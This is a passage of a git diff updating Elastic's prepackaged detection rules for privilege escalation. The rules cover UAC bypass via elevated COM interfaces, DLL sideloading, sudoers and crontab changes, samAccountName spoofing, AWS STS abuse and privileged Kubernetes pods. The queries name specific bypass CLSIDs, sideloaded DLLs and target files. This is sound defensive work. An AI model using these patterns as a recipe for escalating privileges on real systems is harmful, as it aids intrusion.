(\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_privileged_pod_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_privileged_pod_created.json new file mode 100644 index 0000000000000..fae09d7b99d87 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_privileged_pod_created.json @@ -0,0 +1,69 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rule detects when a user creates a pod/container running in privileged mode. A highly privileged container has access to the node's resources and breaks the isolation between containers. If compromised, an attacker can use the privileged container to gain access to the underlying host. Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.", + "false_positives": [ + "By default a container is not allowed to access any devices on the host, but a \"privileged\" container is given access to all devices on the host. This allows the container nearly all the same access as processes running on the host. An administrator may want to run a privileged container to use operating system administrative capabilities such as manipulating the network stack or accessing hardware devices from within the cluster." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Privileged Pod Created", + "note": "", + "query": "kubernetes.audit.objectRef.resource:pods and kubernetes.audit.verb:create and\n kubernetes.audit.requestObject.spec.containers.securityContext.privileged:true\n", + "references": [ + "https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF", + "https://kubernetes.io/docs/tasks/configure-pod-container/security-context/" + ], + "required_fields": [ + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.containers.securityContext.privileged", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "c7908cac-337a-4f38-b50d-5eeb78bdb531", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Kubernetes", + "Continuous Monitoring", + "Execution", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_rogue_windir_environment_var.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_rogue_windir_environment_var.json index d94fdbc846847..b9b45b6318976 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_rogue_windir_environment_var.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_rogue_windir_environment_var.json @@ -14,6 +14,18 @@ "references": [ "https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "d563aaba-2e72-462b-8658-3e5ea22db3a6", "severity": "high", @@ -50,5 +62,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_crontab_filemod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_crontab_filemod.json index 57f893168ba57..68850cf6ae57f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_crontab_filemod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_crontab_filemod.json @@ -16,6 +16,28 @@ "https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc", "https://www.exploit-db.com/exploits/42146" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "0ff84c42-873d-41a2-a4ed-08d74d352d01", "severity": "high", @@ -52,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_login_without_mfa.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_login_without_mfa.json index 33b5cd400fd33..e743943997a1c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_login_without_mfa.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_login_without_mfa.json @@ -15,13 +15,53 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Root Login Without MFA", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS Root Login Without MFA\n\nMulti-factor authentication (MFA) in AWS is a simple best practice that adds an extra layer of protection on top of your\nuser name and password. With MFA enabled, when a user signs in to an AWS Management Console, they will be prompted for\ntheir user name and password, as well as for an authentication code from their AWS MFA device. Taken together, these\nmultiple factors provide increased security for your AWS account settings and resources.\n\nFor more information about using MFA in AWS, access the [official documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html).\n\nThe AWS root account is the one identity that has complete access to all AWS services and resources in the account,\nwhich is created when the AWS account is created. AWS strongly recommends that you do not use the root user for your\neveryday tasks, even the administrative ones. Instead, adhere to the best practice of using the root user only to create\nyour first IAM user. Then securely lock away the root user credentials and use them to perform only a few account and\nservice management tasks. Amazon provides a [list of the tasks that require root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root).\n\nThis rule looks for attempts to log in to AWS as the root user without using multi-factor authentication (MFA), meaning\nthe account is not secured properly. \n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Examine whether this activity is common in the environment by looking for past occurrences on your logs.\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the\n calling user?\n- Examine the commands, API calls, and data management actions performed by the account in the last 24 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking access to servers,\nservices, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- While this activity is not inherently malicious, the root account must use MFA. The security team should address any\npotential benign true positive (B-TP), as this configuration can risk the entire cloud environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Identify the services or servers involved criticality.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify if there are any regulatory or legal ramifications related to this activity.\n- Configure multi-factor authentication for the user.\n- Follow security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:signin.amazonaws.com and event.action:ConsoleLogin and\n aws.cloudtrail.user_identity.type:Root and\n aws.cloudtrail.console_login.additional_eventdata.mfa_used:false and\n event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.console_login.additional_eventdata.mfa_used", + "type": "boolean" + }, + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "bc0c6f0d-dab0-47a3-b135-0925f0a333bc", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -50,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_samaccountname_spoofing_attack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_samaccountname_spoofing_attack.json index 7e52ab1c3fd52..708cd3a1d8a0e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_samaccountname_spoofing_attack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_samaccountname_spoofing_attack.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privileged Escalation via SamAccountName Spoofing", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "iam where event.action == \"renamed-user-account\" and\n /* machine account name renamed to user like account name */\n winlog.event_data.OldTargetUserName : \"*$\" and not winlog.event_data.NewTargetUserName : \"*$\"\n", "references": [ "https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e", @@ -20,8 +20,26 @@ "https://twitter.com/exploitph/status/1469157138928914432", "https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.NewTargetUserName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.OldTargetUserName", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -72,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_assumerole_usage.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_assumerole_usage.json index 4688d4cb79b81..96fc3e8b44447 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_assumerole_usage.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_assumerole_usage.json @@ -13,13 +13,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Security Token Service (STS) AssumeRole Usage", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:sts.amazonaws.com and event.action:AssumedRole and \naws.cloudtrail.user_identity.session_context.session_issuer.type:Role and event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:sts.amazonaws.com and event.action:AssumedRole and\naws.cloudtrail.user_identity.session_context.session_issuer.type:Role and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.session_context.session_issuer.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "93075852-b0f5-4b8b-89c3-a226efae5726", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -70,5 +105,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_getsessiontoken_abuse.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_getsessiontoken_abuse.json index c5e2669c1fade..a01af42f30a00 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_getsessiontoken_abuse.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_getsessiontoken_abuse.json @@ -13,13 +13,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS STS GetSessionToken Abuse", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:sts.amazonaws.com and event.action:GetSessionToken and \naws.cloudtrail.user_identity.type:IAMUser and event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:sts.amazonaws.com and event.action:GetSessionToken and\naws.cloudtrail.user_identity.type:IAMUser and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "b45ab1d2-712f-4f01-a751-df3826969807", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -70,5 +105,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudo_buffer_overflow.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudo_buffer_overflow.json index 1c7a064131171..e68eb5a7e8ebf 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudo_buffer_overflow.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudo_buffer_overflow.json @@ -21,6 +21,28 @@ "https://www.bleepingcomputer.com/news/security/latest-macos-big-sur-also-has-sudo-root-privilege-escalation-flaw", "https://www.sudo.ws/alerts/unescape_overflow.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f37f3054-d40b-49ac-aa9b-a786c74c58b8", "severity": "high", @@ -56,5 +78,5 @@ "value": 100 }, "type": "threshold", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudoers_file_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudoers_file_mod.json index 963c16ae4dd61..6a4493f2746db 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudoers_file_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudoers_file_mod.json @@ -12,6 +12,23 @@ "license": "Elastic License v2", "name": "Sudoers File Modification", "query": "event.category:file and event.type:change and file.path:(/etc/sudoers* or /private/etc/sudoers*)\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4", "severity": "medium", @@ -49,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_suspicious_dnshostname_update.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_suspicious_dnshostname_update.json index 07d373f3a2151..d96edca66b593 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_suspicious_dnshostname_update.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_suspicious_dnshostname_update.json @@ -16,6 +16,63 @@ "https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26923" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.DnsHostName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "6bed021a-0afb-461c-acbe-ffdb9574d3f3", "severity": "high", @@ -57,5 +114,5 @@ } ], "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_clipup.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_clipup.json index 86d43189c8207..b0b1442858efb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_clipup.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_clipup.json @@ -12,13 +12,41 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"Clipup.exe\" and\n not process.executable : \"C:\\\\Windows\\\\System32\\\\ClipUp.exe\" and process.parent.name : \"dllhost.exe\" and\n /* CLSID of the Elevated COM Interface IEditionUpgradeManager */\n process.parent.args : \"/Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}\"\n", "references": [ "https://github.com/hfiref0x/UACME" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_ieinstal.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_ieinstal.json index d759d0f2a4875..e7c01d0bc61e3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_ieinstal.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_ieinstal.json @@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.executable : \"C:\\\\*\\\\AppData\\\\*\\\\Temp\\\\IDC*.tmp\\\\*.exe\" and\n process.parent.name : \"ieinstal.exe\" and process.parent.args : \"-Embedding\"\n\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", "references": [ "https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_interface_icmluautil.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_interface_icmluautil.json index 3e6dfc998b5e4..b68a0a74d80a7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_interface_icmluautil.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_interface_icmluautil.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via ICMLuaUtil Elevated COM Interface", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name == \"dllhost.exe\" and\n process.parent.args in (\"/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\", \"/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}\") and\n process.pe.original_file_name != \"WerFault.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_diskcleanup_hijack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_diskcleanup_hijack.json index 84cb66211e5e2..03763396bdac9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_diskcleanup_hijack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_diskcleanup_hijack.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via DiskCleanup Scheduled Task Hijack", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.args : \"/autoclean\" and process.args : \"/d\" and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\System32\\\\taskhostw.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_dll_sideloading.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_dll_sideloading.json index 3ee72bac00507..8b9e32e4968f3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_dll_sideloading.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_dll_sideloading.json @@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Privileged IFileOperation COM Interface", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type : \"change\" and process.name : \"dllhost.exe\" and\n /* Known modules names side loaded into process running with high or system integrity level for UAC Bypass, update here for new modules */\n file.name : (\"wow64log.dll\", \"comctl32.dll\", \"DismCore.dll\", \"OskSupport.dll\", \"duser.dll\", \"Accessibility.ni.dll\") and\n /* has no impact on rule logic just to avoid OS install related FPs */\n not file.path : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*\", 